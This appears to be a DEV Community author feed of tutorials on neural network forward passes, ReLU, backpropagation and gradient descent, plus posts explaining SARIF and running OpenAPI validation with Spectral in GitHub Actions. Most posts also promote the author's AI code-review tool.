DEV Community: Ganesh Kumar

Understanding Multiple Input and Output Neural Network

Ganesh Kumar — Tue, 07 Jul 2026 12:28:28 +0000

Hello, I'm Ganesh. I'm building git-lrc, an AI code reviewer that runs on every commit. It is free, unlimited, and source-available on GitHub. Star git-lrc on GitHub to help more developers discover the project. Do give it a try and share your feedback to help improve the product.

In the previous article, we discussed how ReLU activation function works. Now let's see how multiple input and multiple output neural networks work.

How Multiple Input and Output Neural Network works

Until now, we worked with a neural network that had a single input and a single output. In real-world problems, we usually have multiple inputs and multiple outputs.

In this article, we will build a neural network with:

2 inputs (input1 and input2)
1 hidden layer with 2 neurons
3 outputs (output1, output2, output3)
ReLU as the activation function

Network Structure

input1 ──┐
         ├──► hidden_neuron1 ──┬──► output1
input2 ──┤                     ├──► output2
         └──► hidden_neuron2 ──┴──► output3

Each input is connected to each hidden neuron, and each hidden neuron is connected to each output neuron.

Forward Pass Equations

Initially, all weights and biases are assigned random values drawn from a normal distribution.

Hidden Layer Calculation

For hidden neuron 1:

x1 = (input1 * w1) + (input2 * w2) + b1
y1 = ReLU(x1) = max(0, x1)

For hidden neuron 2:

x2 = (input1 * w3) + (input2 * w4) + b2
y2 = ReLU(x2) = max(0, x2)

Output Layer Calculation

For output1:

output1 = (y1 * w5) + (y2 * w6) + b3

For output2:

output2 = (y1 * w7) + (y2 * w8) + b4

For output3:

output3 = (y1 * w9) + (y2 * w10) + b5

Example with Numbers

Let's work through a concrete example.

Given inputs:

input1 = 2
input2 = 3

Assume the following initial weights and biases:

Hidden layer weights:
  w1 = 0.5,  w2 = -0.3,  b1 = 0.1
  w3 = -0.4, w4 = 0.8,   b2 = 0.2

Output layer weights:
  w5 = 0.6,  w6 = 0.7,  b3 = 0.1
  w7 = -0.5, w8 = 0.4,  b4 = 0.2
  w9 = 0.3,  w10 = -0.6, b5 = 0.0

Calculate hidden neuron values

Hidden neuron 1:

x1 = (2 * 0.5) + (3 * -0.3) + 0.1
   = 1.0 - 0.9 + 0.1
   = 0.2

y1 = ReLU(0.2) = max(0, 0.2) = 0.2

Hidden neuron 2:

x2 = (2 * -0.4) + (3 * 0.8) + 0.2
   = -0.8 + 2.4 + 0.2
   = 1.8

y2 = ReLU(1.8) = max(0, 1.8) = 1.8

Calculate outputs

Output 1:

output1 = (0.2 * 0.6) + (1.8 * 0.7) + 0.1
        = 0.12 + 1.26 + 0.1
        = 1.48

Output 2:

output2 = (0.2 * -0.5) + (1.8 * 0.4) + 0.2
        = -0.10 + 0.72 + 0.2
        = 0.82

Output 3:

output3 = (0.2 * 0.3) + (1.8 * -0.6) + 0.0
        = 0.06 - 1.08 + 0.0
        = -1.02

Final Results

output1 = 1.48
output2 = 0.82
output3 = -1.02
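
The same forward pass can be sketched in a few lines of Python. This is only a minimal illustration that hard-codes the example weights and biases from above; the function names relu and forward are my own choices, not part of any library.

```python
def relu(x):
    """ReLU activation: returns x when it is positive, otherwise 0."""
    return max(0.0, x)


def forward(input1, input2):
    # Hidden layer: weighted sum of both inputs plus bias, then ReLU
    x1 = input1 * 0.5 + input2 * -0.3 + 0.1
    x2 = input1 * -0.4 + input2 * 0.8 + 0.2
    y1, y2 = relu(x1), relu(x2)

    # Output layer: weighted sum of both hidden outputs plus bias (no activation)
    output1 = y1 * 0.6 + y2 * 0.7 + 0.1
    output2 = y1 * -0.5 + y2 * 0.4 + 0.2
    output3 = y1 * 0.3 + y2 * -0.6 + 0.0
    return output1, output2, output3


outputs = forward(2, 3)
print([round(o, 2) for o in outputs])  # [1.48, 0.82, -1.02]
```

The rounding is only there to hide tiny floating-point noise; the values match the hand calculation.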

Why ReLU works here

Notice that x1 = 0.2 and x2 = 1.8 — both are positive, so ReLU passes them through unchanged.

If any x value were negative (say x1 = -0.5), then:

y1 = ReLU(-0.5) = max(0, -0.5) = 0

That neuron would contribute nothing to the outputs for that input, effectively "turning off". Because some neurons output exactly 0, the activations of a ReLU network tend to be sparse.

Matrix Representation

You can think of all the weights as a matrix of connections:

Hidden Layer (2x2 weight matrix + 2 biases):

  w1   w2   b1
[ 0.5 -0.3  0.1 ]   → hidden_neuron1

  w3   w4   b2
[-0.4  0.8  0.2 ]   → hidden_neuron2

Output Layer (3x2 weight matrix + 3 biases):

  w5   w6   b3
[ 0.6  0.7  0.1 ]   → output1

  w7   w8   b4
[-0.5  0.4  0.2 ]   → output2

  w9  w10   b5
[ 0.3 -0.6  0.0 ]   → output3

Each output neuron learns a different combination of the hidden neuron outputs, allowing the network to produce multiple independent predictions.
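
To make the matrix view concrete, here is a small sketch that stores each layer as a list of rows and applies it with a matrix-vector product. The helper matvec and the variable names are assumptions made for this example; in practice a library such as NumPy would usually do this step.

```python
def matvec(matrix, vector, bias):
    """Multiply a weight matrix by a vector and add the bias, one row per neuron."""
    return [
        sum(w * v for w, v in zip(row, vector)) + b
        for row, b in zip(matrix, bias)
    ]


# One row per neuron, using the example weights from this article
W_hidden = [[0.5, -0.3], [-0.4, 0.8]]
b_hidden = [0.1, 0.2]
W_output = [[0.6, 0.7], [-0.5, 0.4], [0.3, -0.6]]
b_output = [0.1, 0.2, 0.0]

inputs = [2, 3]
hidden = [max(0.0, x) for x in matvec(W_hidden, inputs, b_hidden)]  # ReLU
outputs = matvec(W_output, hidden, b_output)

print([round(h, 2) for h in hidden])   # [0.2, 1.8]
print([round(o, 2) for o in outputs])  # [1.48, 0.82, -1.02]
```

Adding another output neuron only means adding one more row to W_output and one more entry to b_output.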

Conclusion

We now understand how a neural network with 2 inputs and 3 outputs works step by step using the ReLU activation function:

Each hidden neuron receives all inputs, computes a weighted sum plus bias, and applies ReLU.
Each output neuron receives all hidden neuron outputs and computes its own weighted sum plus bias.
The network can produce multiple distinct outputs simultaneously from the same inputs.

Any feedback or contributors are welcome! It's online, source-available, and ready for anyone to use.

⭐ Star git-lrc on GitHub

Understanding ReLU activation function for Neural Network

Ganesh Kumar — Sun, 05 Jul 2026 17:15:07 +0000

In the previous article, we discussed how backpropagation actually works. We also calculated the weights and biases for all the layers.
We used the softplus activation function for our small neural network.

Now, in this article, let's use the ReLU function for the neural network.

Definition of ReLU

It is a function that returns the input if the input is positive; otherwise it returns 0.

f(x) = max(0, x)

Written piecewise:

f(x) = x if x > 0
f(x) = 0 if x <= 0

Using ReLU in Neural Network

For the first layer, we calculate the following.

As we use 2 hidden neurons in the first layer, we have to calculate the value for each neuron separately.

x1 = (input * weight1) + bias1
y1 = ReLU(x1)

Similarly, for the second hidden neuron:

x2 = (input * weight2) + bias2
y2 = ReLU(x2)
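
As a quick illustration, the two hidden neurons can be written as a short Python function. The numbers passed in below are hypothetical values chosen only to show one neuron staying active and the other being switched off; they are not taken from the earlier articles.

```python
def relu(x):
    """Return x when it is positive, otherwise 0."""
    return max(0.0, x)


def hidden_layer(input_value, weight1, bias1, weight2, bias2):
    """Compute the outputs of both hidden neurons for a single input."""
    x1 = input_value * weight1 + bias1
    x2 = input_value * weight2 + bias2
    return relu(x1), relu(x2)


# Hypothetical input, weights, and biases
y1, y2 = hidden_layer(0.5, weight1=2.0, bias1=-0.4, weight2=-1.5, bias2=0.3)
print(y1, y2)
```

Here x1 is positive, so y1 keeps its value, while x2 is negative, so y2 becomes 0.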

Conclusion

From both equations, we can calculate the outputs of the first layer and pass them to the second layer.


Understanding Backpropagation: Calculating Gradients for Hidden Layer Weights and Biases

Ganesh Kumar — Tue, 30 Jun 2026 18:51:03 +0000

In the previous article, we derived formulas for updating the output layer weights w3, w4, and bias b3. Now, we will understand how to calculate the gradients for the hidden layer parameters: w1, b1, w2, and b2.

How are w1, b1, w2, and b2 connected to the prediction?

To find the gradients of the parameters in the hidden layer, we need to trace how changing these values affects the final prediction and the error (SSR).

Let's recall the structure of our neural network:

For the top neuron:

x1 = input * w1 + b1

y1 = f(x1) = log(1 + e^x1) (using the softplus function)

For the bottom neuron:

x2 = input * w2 + b2

y2 = f(x2) = log(1 + e^x2) (using the softplus function)

Finally, the prediction:

Predicted = y1 * w3 + y2 * w4 + b3

And the prediction error:

SSR = Σ (observed − predicted)²

Since w1, b1, w2, and b2 are not directly connected to the output prediction, we must use the chain rule to backpropagate the error from the output layer back to the hidden layer.

Applying the Chain Rule to the Hidden Layer

Let's calculate the gradient for the top neuron's weight w1 first.

A change in w1 affects x1, which affects the output y1, which affects the predicted value, which finally affects the SSR.

So, by the chain rule:

dSSR/dw1 = dSSR/d(predicted) * d(predicted)/dy1 * dy1/dx1 * dx1/dw1

Let's calculate each of these values:

1. dSSR/d(predicted)

As we saw in the previous articles, this is the derivative of SSR with respect to the predicted value:

dSSR/d(predicted) = -2 * (Observed - Predicted)

2. d(predicted)/dy1

Since Predicted = y1 * w3 + y2 * w4 + b3, and all other terms are treated as constants w.r.t y1:

d(predicted)/dy1 = w3

3. dy1/dx1

Since y1 = log(1 + e^x1), the derivative of the softplus function is the logistic sigmoid function:

dy1/dx1 = e^x1 / (1 + e^x1)

4. dx1/dw1

Since x1 = input * w1 + b1, differentiating w.r.t w1 gives:

dx1/dw1 = input

Final formula for dSSR/dw1:

Multiplying these parts together, we get:

dSSR/dw1 = -2 * (Observed - Predicted) * w3 * (e^x1 / (1 + e^x1)) * input

Deriving the Gradient for Bias b1

Similarly, for the top neuron's bias b1:

dSSR/db1 = dSSR/d(predicted) * d(predicted)/dy1 * dy1/dx1 * dx1/db1

The only term that changes here is the last one:

dx1/db1 = 1 (since x1 = input * w1 + b1, derivative w.r.t b1 is 1)

So:

dSSR/db1 = -2 * (Observed - Predicted) * w3 * (e^x1 / (1 + e^x1)) * 1

Deriving the Gradients for the Bottom Neuron (w2 and b2)

Following the same logic, we can find the gradients for the bottom neuron's parameters:

For weight w2:

dSSR/dw2 = dSSR/d(predicted) * d(predicted)/dy2 * dy2/dx2 * dx2/dw2

dSSR/dw2 = -2 * (Observed - Predicted) * w4 * (e^x2 / (1 + e^x2)) * input

For bias b2:

dSSR/db2 = dSSR/d(predicted) * d(predicted)/dy2 * dy2/dx2 * dx2/db2

dSSR/db2 = -2 * (Observed - Predicted) * w4 * (e^x2 / (1 + e^x2)) * 1
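
One way to gain confidence in these four formulas is to compare them with a numerical slope. The sketch below does that in plain Python. The parameter values and the three training samples are hypothetical, the function names are my own, and the gradients are summed over all samples because SSR is a sum over samples.

```python
import math


def softplus(x):
    return math.log(1.0 + math.exp(x))


def sigmoid(x):
    # Derivative of softplus: e^x / (1 + e^x)
    return math.exp(x) / (1.0 + math.exp(x))


def predict(inp, p):
    y1 = softplus(inp * p["w1"] + p["b1"])
    y2 = softplus(inp * p["w2"] + p["b2"])
    return y1 * p["w3"] + y2 * p["w4"] + p["b3"]


def ssr(data, p):
    return sum((obs - predict(inp, p)) ** 2 for inp, obs in data)


def hidden_gradients(data, p):
    """Gradients of SSR w.r.t. w1, b1, w2, b2 using the chain-rule formulas."""
    g = {"w1": 0.0, "b1": 0.0, "w2": 0.0, "b2": 0.0}
    for inp, obs in data:
        x1 = inp * p["w1"] + p["b1"]
        x2 = inp * p["w2"] + p["b2"]
        common = -2.0 * (obs - predict(inp, p))  # dSSR/d(predicted)
        g["w1"] += common * p["w3"] * sigmoid(x1) * inp
        g["b1"] += common * p["w3"] * sigmoid(x1) * 1.0
        g["w2"] += common * p["w4"] * sigmoid(x2) * inp
        g["b2"] += common * p["w4"] * sigmoid(x2) * 1.0
    return g


# Hypothetical parameters and (input, observed) pairs, for illustration only
params = {"w1": 2.0, "b1": -1.0, "w2": -1.5, "b2": 0.5,
          "w3": -1.2, "w4": 0.8, "b3": 0.0}
data = [(0.0, 0.0), (0.5, 1.0), (1.0, 0.0)]

grads = hidden_gradients(data, params)

# Compare each formula with a finite-difference estimate of the slope
eps = 1e-6
for name, value in grads.items():
    up = dict(params, **{name: params[name] + eps})
    down = dict(params, **{name: params[name] - eps})
    numeric = (ssr(data, up) - ssr(data, down)) / (2 * eps)
    print(name, round(value, 6), round(numeric, 6))
```

If the two columns agree for every parameter, the chain-rule derivation and the code are consistent with each other.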

Improving Prediction with self Learning

Once we calculate all these derivatives (dSSR/dw1, dSSR/db1, dSSR/dw2, dSSR/db2), we can update the hidden layer weights and biases using gradient descent:

Step size w1 = dSSR/dw1 * Learning rate
New w1 = old w1 - Step size w1

Step size b1 = dSSR/db1 * Learning rate
New b1 = old b1 - Step size b1

Step size w2 = dSSR/dw2 * Learning rate
New w2 = old w2 - Step size w2

Step size b2 = dSSR/db2 * Learning rate
New b2 = old b2 - Step size b2

By doing this repeatedly, the model reduces the error step by step and moves toward values of the weights and biases that minimize it.

Conclusion

We have successfully derived the formulas to calculate the gradients for w1, b1, w2, and b2. Combined with the output layer derivations, we now have the math for the entire neural network's backpropagation!

In the next article, we will see how to implement this in code.


Understanding Backpropagation: Chain Rule, SSR Gradients, and Weight Updates in Neural Networks

Ganesh Kumar — Tue, 23 Jun 2026 04:02:53 +0000

In the previous article, we derived the formula for updating b3. Now we will understand how to derive the gradients for the weights w3 and w4.

How Are the Weights Connected to the Output Layer?

In the previous derivation, we treated b3 as the variable and w3 and w4 as constants.

To find their values, we now need to treat w3 and w4 as variables.

The weights w3 and w4 multiply the activation outputs of the top and bottom neurons.

The activation output of the top neuron is y1.

As it uses the softplus function:

x1 = input * w1 + b1

y1 = f(x1) = log(1 + e^x1)

Similarly, for the bottom neuron:

x2 = input * w2 + b2

y2 = f(x2) = log(1 + e^x2)

So, finally, the prediction is:

Predicted = y1 * w3 + y2 * w4 + b3

And the error is:

SSR = Σ (observed − predicted)²

How Is Each Value Calculated?

Now we apply the chain rule to take the derivative of SSR with respect to w3, w4, and b3.

dSSR/dw3 = dSSR/d(predicted) * d(predicted)/dw3

dSSR/dw4 = dSSR/d(predicted) * d(predicted)/dw4

dSSR/db3 = dSSR/d(predicted) * d(predicted)/db3

We can see that dSSR/d(predicted) is common to all three derivatives.

dSSR/d(predicted) = 2 * (Observed - Predicted) * -1 = -2 * (Observed - Predicted)

Now, for d(predicted)/dw3:

d(predicted)/dw3 = d(y1 * w3 + y2 * w4 + b3)/dw3 = y1

since all the remaining terms are constant w.r.t. w3.

Similarly, for d(predicted)/dw4:

d(predicted)/dw4 = d(y1 * w3 + y2 * w4 + b3)/dw4 = y2

since all the remaining terms are constant w.r.t. w4.

Now, for d(predicted)/db3:

d(predicted)/db3 = d(y1 * w3 + y2 * w4 + b3)/db3 = 1

since all the remaining terms are constant w.r.t. b3.

Finally, we get:

dSSR/dw3 = dSSR/d(predicted) * d(predicted)/dw3 = 2 * (Observed - Predicted) * -1 * y1 = -2 * (Observed - Predicted) * y1

dSSR/dw4 = dSSR/d(predicted) * d(predicted)/dw4 = 2 * (Observed - Predicted) * -1 * y2 = -2 * (Observed - Predicted) * y2

dSSR/db3 = dSSR/d(predicted) * d(predicted)/db3 = 2 * (Observed - Predicted) * -1 * 1 = -2 * (Observed - Predicted)
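
Here is a minimal Python sketch of the three output-layer gradients, starting from SSR = Σ (observed − predicted)², so that dSSR/d(predicted) = -2 * (observed - predicted) for each sample. The function name and the sample values (y1, y2, observed) are hypothetical and were picked so the arithmetic is easy to follow by hand.

```python
def output_gradients(samples, w3, w4, b3):
    """samples: list of (y1, y2, observed) tuples.

    Returns (dSSR/dw3, dSSR/dw4, dSSR/db3), summed over all samples.
    """
    d_w3 = d_w4 = d_b3 = 0.0
    for y1, y2, observed in samples:
        predicted = y1 * w3 + y2 * w4 + b3
        d_pred = -2.0 * (observed - predicted)  # dSSR/d(predicted)
        d_w3 += d_pred * y1   # d(predicted)/dw3 = y1
        d_w4 += d_pred * y2   # d(predicted)/dw4 = y2
        d_b3 += d_pred * 1.0  # d(predicted)/db3 = 1
    return d_w3, d_w4, d_b3


# Hypothetical hidden-neuron outputs and observed values
samples = [(0.5, 1.0, 0.0), (1.0, 0.5, 1.0), (2.0, 0.0, 0.0)]
grads = output_gradients(samples, w3=1.0, w4=-1.0, b3=0.0)
print(grads)  # (6.5, -1.5, 2.0)
```

A positive gradient (as for w3 here) means that decreasing that parameter lowers the SSR, and a negative gradient means that increasing it lowers the SSR.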

Improving Prediction with self Learning

Now we calculate dSSR/dw3, dSSR/dw4, and dSSR/db3.

Then we repeatedly adjust each parameter until its derivative is close to 0, which is where the error is at a minimum.

Step size w3 = dSSR/dw3 * Learning rate

New w3 = old w3 - Step size w3

Do the same thing for w4 and b3.

Conclusion

We now have an idea of how the weights and bias of the output neuron are calculated. We can extend this idea to multiple layers.

In the next article, we will see how to calculate the weights across multiple layers.


How to calculate weights using gradient descent

Ganesh Kumar — Fri, 19 Jun 2026 11:29:00 +0000

In the previous article, I explained the requirements for finding the weights of the last layer. Now let's see how we actually assign and optimize those weights using gradient descent.

Selecting Random Weights From a Normal Distribution

First, we assign random numbers (drawn from a normal distribution) to the weights w3 and w4.

Then we sum up both results along with the bias b3 = 0:

predicted = (output of top neuron × w3) + (output of bottom neuron × w4) + b3

This gives us our initial prediction, which we can plot as the output curve of the network.

With these initial random weights, the SSR (Sum of Squared Residuals) is calculated again to measure how far off our predictions are.
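
A minimal sketch of this starting point in Python is shown below. It uses random.gauss from the standard library to draw w3 and w4 from a standard normal distribution. The hidden-neuron outputs and observed values are hypothetical, since the actual training data is not listed here.

```python
import random

random.seed(0)  # fixed seed so the run is repeatable

# Hypothetical (top neuron output, bottom neuron output, observed) triples
samples = [
    (0.2, 1.1, 0.0),
    (0.9, 0.6, 1.0),
    (1.6, 0.1, 0.0),
]

# Draw the initial output-layer weights from a standard normal distribution
w3 = random.gauss(0.0, 1.0)
w4 = random.gauss(0.0, 1.0)
b3 = 0.0  # the bias starts at 0


def predict(top, bottom):
    return top * w3 + bottom * w4 + b3


# Sum of squared residuals for the initial random weights
ssr = sum((observed - predict(top, bottom)) ** 2
          for top, bottom, observed in samples)
print(f"w3={w3:.3f}, w4={w4:.3f}, SSR={ssr:.3f}")
```

The SSR printed here is the baseline that gradient descent then tries to reduce.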

Gradient Descent Algorithm For Optimal Values

Now we need to find the derivative of SSR with respect to b3 so we can update it.

Recall our loss function:

SSR = Σ (observed − predicted)²

And our predicted value is:

predicted = (output of top neuron × w3) + (output of bottom neuron × w4) + b3

This is the same chain rule approach we used for backpropagation when optimizing only b3.

The key insight here is that the products of w3 and w4 with their respective neuron outputs are treated as constants for a single gradient calculation with respect to b3. Since only b3 is the variable in this expression, the derivative simplifies cleanly — just as we saw in the previous articles.

Conclusion

By assigning random weights from a normal distribution and then applying gradient descent with the chain rule, we can iteratively optimize each weight and bias in the network. The same process that worked for b3 alone now extends to w3 and w4 — we just need to carefully apply the chain rule at each step to compute the correct gradients.


Understanding the Idea Behind Full Backpropagation

Ganesh Kumar — Wed, 17 Jun 2026 12:59:48 +0000

In the previous article, we learned how to calculate the gradient of the last bias in a neural network.

Now we will explore how gradients flow through the entire network and how to calculate the weights of previous layers.

How to calculate weights

Now we will calculate the weights of the previous layer.

The challenge is that the loss function does not directly depend on these earlier weights.

For example, consider a weight in a hidden layer, such as w1 or w2 in our network.

Changing that weight:

Changes the hidden neuron output.
Changes the output neuron input.
Changes the final prediction.
Changes the loss.

So there is an indirect relationship between the weight and the loss.

This is exactly why we need the chain rule.

Conclusion

As in the previous calculation, we compute the gradients for all weights and biases using the chain rule and then update them with gradient descent.


Why Do Neural Networks Need the Chain Rule? How do we apply it?

Ganesh Kumar — Sat, 13 Jun 2026 03:26:39 +0000

In the previous article, we introduced backpropagation and learned that neural networks improve by reducing prediction errors.

We also saw that backpropagation relies on two fundamental ideas:

The Chain Rule
Gradient Descent

But we haven't yet answered an important question:

How do we calculate the weights and biases that decrease the error?

To answer that, let's look at a very small neural network.

A Simple Neural Network

Imagine a neural network similar to the previous example, with:

One input neuron
Two hidden neurons
One output neuron

Calculating the Last Bias in the Last Layer

Let's assume we already have the weights and biases of the hidden layer, and we only want to find the last bias, b3.

From gradient descent, we can update the last bias b3 using the partial derivative of the loss with respect to b3.

The error is measured with residuals:
Residual = Observed - Predicted

SSR = Sum of (Observed - Predicted)^2

We take 3 samples for training: the starting, middle, and ending values.

Finally, we calculate the SSR over these samples.

Use of Chain Rule

Here we optimize only b3 using gradient descent.

The predicted value is built from the weights and biases of the previous layer:

Predicted = Top Layer + Bottom Layer + Bias (b3)

Using the chain rule, we can write the derivative of SSR with respect to b3 as:

dssr/db3 = dssr/dpredicted * dpredicted/db3

For a single sample:

SSR = (Observed - Predicted)^2

Predicted is not a constant here; it is the variable we are differentiating with respect to.

dssr/dpredicted = 2*(Observed - Predicted)*(d(Observed - Predicted)/dpredicted)

dssr/dpredicted = 2*(Observed - Predicted)*(-1)
dssr/dpredicted = -2*(Observed - Predicted)

For dpredicted/db3:

Predicted = Top Layer + Bottom Layer + Bias (b3)
Both Top Layer and Bottom Layer are constant for this calculation, so:
dpredicted/db3 = 1

Finally, dssr/db3 = -2*(Observed - Predicted) * 1

Slope Calculation and Learning

Now we have 3 predicted values, one for each of the 3 samples:

dssr/db3 = Σ(-2*(Observed-Predicted))

dssr/db3 = -2 * [(Observed1 - Predicted1) * 1 + (Observed2 - Predicted2) * 1 + (Observed3 - Predicted3) * 1]

dssr/db3 = -2 * [(Residual1) + (Residual2) + (Residual3)]

dssr/db3 = -2 * (ResidualSum)

For our training data, I got slope = -15.7

step size = slope x learning rate

step size = -15.7 x 0.1 = -1.57

new b3 = old b3 - step size

new b3 = 0 - (-1.57) = 1.57

Then, recalculating the slope with the new b3, we get:

slope = -6.26

step size = -6.26 x 0.1 = -0.626

new b3 = 1.57 - (-0.626) = 2.196

We repeat this calculation until the step size is close to 0.
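
The repeated update can be sketched as a short loop. Since the training data itself is not listed here, the sketch rests on one assumption: b3 is added to all 3 predictions, so dssr/db3 = -2 * (ResidualSum) changes by 2 x 3 = 6 for every unit change in b3. Starting from the slope of -15.7 at b3 = 0, the slope is modelled as a straight line. The second value differs slightly from the hand calculation because the reported slopes are rounded.

```python
def slope(b3):
    # Assumed linear model of dssr/db3 for 3 samples, anchored at slope(0) = -15.7
    return -15.7 + 6.0 * b3


learning_rate = 0.1
b3 = 0.0
history = []

for _ in range(100):
    step_size = slope(b3) * learning_rate
    if abs(step_size) < 0.0001:  # stop once the step size is close to 0
        break
    b3 = b3 - step_size          # move against the slope
    history.append(b3)

print([round(b, 3) for b in history[:2]])  # [1.57, 2.198]
print(len(history), "updates, final b3 =", round(b3, 3))
```

Each update shrinks the remaining slope by the same factor, which is why the steps get smaller and smaller until they are effectively 0.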

Final Result
We found the optimal value:
b3 ≈ 2.6

Conclusion

We were able to apply the chain rule, gradient descent, and backpropagation to a very small neural network.

In the next article, we will discuss how to calculate the weights and biases in the same neural network.


Running OpenAPI Validation in GitHub Actions and Showing Findings in Pull Requests

Ganesh Kumar — Wed, 10 Jun 2026 20:39:09 +0000

In a previous article, I explained what SARIF is and why many security and quality tools use it as a common reporting format.

In this article, we'll focus on a practical example: validating an OpenAPI specification in GitHub Actions and displaying findings directly inside GitHub Pull Requests.

By the end, you'll have a workflow that:

Lints your OpenAPI specification
Generates a SARIF report
Uploads results to GitHub Code Scanning
Shows annotations directly in Pull Requests

Sample OpenAPI Specification

Let's start with a simple OpenAPI file that contains a deliberate issue.

openapi: 3.0.3

info:
  title: User API
  version: 1.0.0

paths:
  /users/{id}:
    get:
      operationId: getUserById

      parameters:
        - name: userId
          in: path
          required: true
          schema:
            type: string

      responses:
        "200":
          description: User found

Notice that the path is:

/users/{id}

but the parameter is named:

userId

The parameter name should match the path placeholder (id).

We'll use this mistake to verify that our workflow correctly reports findings.
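
To see what a linter has to detect here, the check can be sketched in a few lines of Python. This is not how Spectral implements its rule; find_path_parameter_mismatches is a hypothetical helper, and the specification is written as a Python dictionary so the example needs no YAML library.

```python
import re


def find_path_parameter_mismatches(spec):
    """Report path placeholders and path parameters that do not match."""
    problems = []
    for path, operations in spec.get("paths", {}).items():
        placeholders = set(re.findall(r"\{([^}]+)\}", path))
        for method, operation in operations.items():
            if not isinstance(operation, dict):
                continue  # skip path-level keys that are not operations
            declared = {
                p["name"]
                for p in operation.get("parameters", [])
                if p.get("in") == "path"
            }
            where = f"{method.upper()} {path}"
            for name in sorted(placeholders - declared):
                problems.append(f"{where}: placeholder '{name}' has no matching path parameter")
            for name in sorted(declared - placeholders):
                problems.append(f"{where}: parameter '{name}' is not used in the path")
    return problems


# The sample specification from above, reduced to the relevant fields
spec = {
    "paths": {
        "/users/{id}": {
            "get": {
                "operationId": "getUserById",
                "parameters": [
                    {"name": "userId", "in": "path", "required": True}
                ],
            }
        }
    }
}

for problem in find_path_parameter_mismatches(spec):
    print(problem)
```

Renaming the parameter to id makes the function return an empty list, which is the state we want the real linter to confirm.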

Installing Spectral

For this example, we'll use Spectral, one of the most popular OpenAPI linting tools.

npm install -g @stoplight/spectral-cli

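Spectral needs a ruleset to know which rules to apply. Create a .spectral.yaml file in the repository root that enables the built-in OpenAPI rules:

extends: ["spectral:oas"]

Then run it locally: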

spectral lint openapi.yaml

You should see an error related to the path parameter mismatch.

Generating a SARIF Report

Instead of printing results to the console, we can generate a SARIF report:

spectral lint openapi.yaml \
  --format sarif \
  --output results.sarif

This produces:

results.sarif

which GitHub can consume directly.

GitHub Actions Workflow

Create:

.github/workflows/openapi.yml

name: OpenAPI Validation

on:
  pull_request:

permissions:
  contents: read
  security-events: write

jobs:
  openapi:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - uses: actions/setup-node@v4
        with:
          node-version: 20

      - name: Install Spectral
        run: npm install -g @stoplight/spectral-cli

      - name: Generate SARIF Report
        run: |
          spectral lint openapi.yaml \
            --format sarif \
            --output results.sarif

      - name: Upload SARIF
        # Run even when the lint step fails, so findings still reach the Pull Request
        if: always()
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: results.sarif

How It Works

The workflow performs four simple steps:

Checks out the repository
Installs Spectral
Generates a SARIF report
Uploads the SARIF report to GitHub

The upload step is handled by GitHub's official SARIF uploader:

- uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif

Once uploaded, GitHub automatically processes the findings.

Viewing Results in Pull Requests

After opening a Pull Request, GitHub analyzes the uploaded SARIF report and associates findings with the corresponding files and lines.

For our example, GitHub highlights the parameter definition and reports something similar to:

Path parameter "id" is not defined.
Expected parameter name "id" but found "userId".

Developers can review the issue directly from the Pull Request without searching through GitHub Action logs.

Why I Prefer This Approach

Many teams simply let the OpenAPI validation job fail and require developers to inspect the CI logs to find out why.

While this works, it doesn't scale well when repositories contain multiple specifications or many validation rules.

Uploading SARIF results provides:

Inline annotations
Better visibility during code review
Centralized findings in GitHub Code Scanning
Consistent reporting across different tools

The same workflow can later be extended to include security scanners, secret scanners, IaC scanners, and custom validation tools.

Conclusion

Integrating OpenAPI validation into GitHub Actions is straightforward. With Spectral generating SARIF output and GitHub handling the presentation layer, developers receive feedback exactly where they are already reviewing code: inside the Pull Request.

If your organization already uses SARIF for other security or quality tools, OpenAPI validation can fit naturally into the same workflow with only a few lines of configuration.


What Is SARIF and How Does It Help Security Tools Work Together?

Ganesh Kumar — Mon, 08 Jun 2026 20:28:21 +0000

If you've ever worked with tools like Semgrep, Trivy, Checkov, Gitleaks, or CodeQL, you've probably noticed that each tool produces results in a different format. Some output JSON, some use XML, while others generate plain text reports.

This creates a problem: how do you aggregate results from multiple tools into a single platform?

That's where SARIF comes in.

What is SARIF?

SARIF stands for Static Analysis Results Interchange Format.

It is an open standard designed to represent findings from static analysis tools, security scanners, linters, and code quality tools in a common format.

Think of SARIF as a universal translator.

Instead of every tool speaking its own language:

Semgrep -> Semgrep JSON
Trivy -> Trivy JSON
Checkov -> Checkov JSON
Gitleaks -> Gitleaks JSON

SARIF allows all of them to communicate using a shared structure:

Semgrep
Trivy
Checkov
Gitleaks
    ↓
   SARIF

Why Was SARIF Created?

Imagine a company running 20 different scanners in its CI/CD pipeline.

Each scanner reports:

Different severity levels
Different file formats
Different metadata
Different output structures
Different CVE identifiers
Different CVSS scores

Building integrations for every tool becomes difficult and expensive.

SARIF solves this problem by providing a standardized schema for:

Rule IDs
Messages
Severity
File locations
Code snippets
Security metadata
Fix suggestions

This allows platforms to consume results from many tools without writing custom integrations for each one.

A Simple Example

Suppose a security scanner finds a vulnerability:

File: app.py
Line: 42
Severity: High
Message: Possible SQL Injection

In SARIF, that information becomes structured JSON that any compatible platform can understand.

The scanner changes, but the format remains the same.
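
As a rough sketch, the finding above could be expressed as a minimal SARIF 2.1.0 log like the one built below in Python. The tool name and rule ID are made up for this example, and mapping "High" to the SARIF level "error" is my assumption, since SARIF levels are none, note, warning, and error.

```python
import json

sarif_log = {
    "version": "2.1.0",
    "runs": [
        {
            # Hypothetical tool name, used only for this example
            "tool": {"driver": {"name": "example-scanner"}},
            "results": [
                {
                    "ruleId": "sql-injection",  # hypothetical rule ID
                    "level": "error",           # assumed mapping for "High"
                    "message": {"text": "Possible SQL Injection"},
                    "locations": [
                        {
                            "physicalLocation": {
                                "artifactLocation": {"uri": "app.py"},
                                "region": {"startLine": 42},
                            }
                        }
                    ],
                }
            ],
        }
    ],
}

print(json.dumps(sarif_log, indent=2))
```

Every finding, whatever the scanner, ends up as one entry in results with the same fields for rule, message, and location.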

How SARIF Helps Developers

One Format for Many Tools

Instead of handling dozens of output formats:

Tool A -> Format A
Tool B -> Format B
Tool C -> Format C

you can standardize on:

Tool A
Tool B
Tool C
   ↓
 SARIF

Better Tool Interoperability

A SARIF file generated by one tool can be consumed by another platform without modification.

This makes integrations significantly easier.

GitHub Code Scanning Support

One of the biggest reasons SARIF became popular is GitHub Code Scanning.

GitHub accepts SARIF uploads and automatically displays:

Security findings
Code quality issues
Vulnerabilities
File-level annotations

directly inside pull requests and repositories.

Easier Aggregation

Organizations often run multiple scanners:

Semgrep
Trivy
Checkov
Gitleaks
Bandit

SARIF makes it possible to combine all findings into a single report.
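
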